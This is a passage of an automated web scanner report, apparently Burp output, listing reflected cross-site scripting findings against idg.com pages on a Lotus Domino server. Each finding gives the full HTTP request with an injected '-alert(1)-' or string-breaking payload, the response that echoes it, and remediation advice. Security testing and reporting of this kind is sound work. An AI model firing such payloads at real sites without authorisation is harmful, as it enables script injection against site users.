This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/home?readformc9917"-alert(1)-"f2355dde872 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:21 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home?readformc9917"-alert(1)-"f2355dde872");
} catch(err) {}</script>
...[SNIP]...

2.203. http://idg.com/www/homenew.nsf/menu.js [OpenJavascriptLibrary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180d9"-alert(1)-"cdc8053a05f was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.js?OpenJavascriptLibrary180d9"-alert(1)-"cdc8053a05f HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5043
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.js?OpenJavascriptLibrary180d9"-alert(1)-"cdc8053a05f");
} catch(err) {}</script>
...[SNIP]...

2.204. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d44cf"%3bcaf6978cbc3 was submitted in the REST URL parameter 1. This input was echoed as d44cf";caf6978cbc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd44cf"%3bcaf6978cbc3/homenew.nsf/menu.js HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5011
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd44cf";caf6978cbc3/homenew.nsf/menu.js");
} catch(err) {}</script>
...[SNIP]...

2.205. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebec9"%3beedfd5695ac was submitted in the REST URL parameter 3. This input was echoed as ebec9";eedfd5695ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.jsebec9"%3beedfd5695ac HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5011
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.jsebec9";eedfd5695ac");
} catch(err) {}</script>
...[SNIP]...

2.206. http://idg.com/www/homenew.nsf/menu.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97eb7"-alert(1)-"93cd9db3b7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.js?97eb7"-alert(1)-"93cd9db3b7d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.js?97eb7"-alert(1)-"93cd9db3b7d=1");
} catch(err) {}</script>
...[SNIP]...

2.207. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/navmain.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34e94"%3b127e9d03196 was submitted in the REST URL parameter 1. This input was echoed as 34e94";127e9d03196 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www34e94"%3b127e9d03196/homenew.nsf/navmain.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www34e94";127e9d03196/homenew.nsf/navmain.css");
} catch(err) {}</script>
...[SNIP]...

2.208. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/navmain.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f539e"%3b607861d5da5 was submitted in the REST URL parameter 3. This input was echoed as f539e";607861d5da5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/navmain.cssf539e"%3b607861d5da5 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/navmain.cssf539e";607861d5da5");
} catch(err) {}</script>
...[SNIP]...

2.209. http://idg.com/www/homenew.nsf/navmain.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/navmain.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd433"-alert(1)-"2d45f6a6216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/navmain.css?fd433"-alert(1)-"2d45f6a6216=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:25 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/navmain.css?fd433"-alert(1)-"2d45f6a6216=1");
} catch(err) {}</script>
...[SNIP]...

2.210. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/newsitems.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cd0f"%3bf6fb67135af was submitted in the REST URL parameter 1. This input was echoed as 3cd0f";f6fb67135af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www3cd0f"%3bf6fb67135af/homenew.nsf/newsitems.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www3cd0f";f6fb67135af/homenew.nsf/newsitems.css");
} catch(err) {}</script>
...[SNIP]...

2.211. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/newsitems.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f39"%3b146b3913e0f was submitted in the REST URL parameter 3. This input was echoed as c2f39";146b3913e0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/newsitems.cssc2f39"%3b146b3913e0f HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/newsitems.cssc2f39";146b3913e0f");
} catch(err) {}</script>
...[SNIP]...

2.212. http://idg.com/www/homenew.nsf/newsitems.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/newsitems.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 652e1"-alert(1)-"826b15b8000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/newsitems.css?652e1"-alert(1)-"826b15b8000=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:28 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/newsitems.css?652e1"-alert(1)-"826b15b8000=1");
} catch(err) {}</script>
...[SNIP]...

2.213. http://idg.com/www/homenew.nsf/public_smo_scripts.js [OpenJavascriptLibrary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcdfe"-alert(1)-"a48c23ad8af was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrarydcdfe"-alert(1)-"a48c23ad8af HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5057
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrarydcdfe"-alert(1)-"a48c23ad8af");
} catch(err) {}</script>
...[SNIP]...

2.214. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46fe3"%3b067128b6aef was submitted in the REST URL parameter 1. This input was echoed as 46fe3";067128b6aef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www46fe3"%3b067128b6aef/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5047
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www46fe3";067128b6aef/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.215. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c119d"%3be19dc6781a0 was submitted in the REST URL parameter 3. This input was echoed as c119d";e19dc6781a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.jsc119d"%3be19dc6781a0?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5047
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.jsc119d";e19dc6781a0?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.216. http://idg.com/www/homenew.nsf/public_smo_scripts.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ca8"-alert(1)-"85e454a4e95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.js?f4ca8"-alert(1)-"85e454a4e95=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
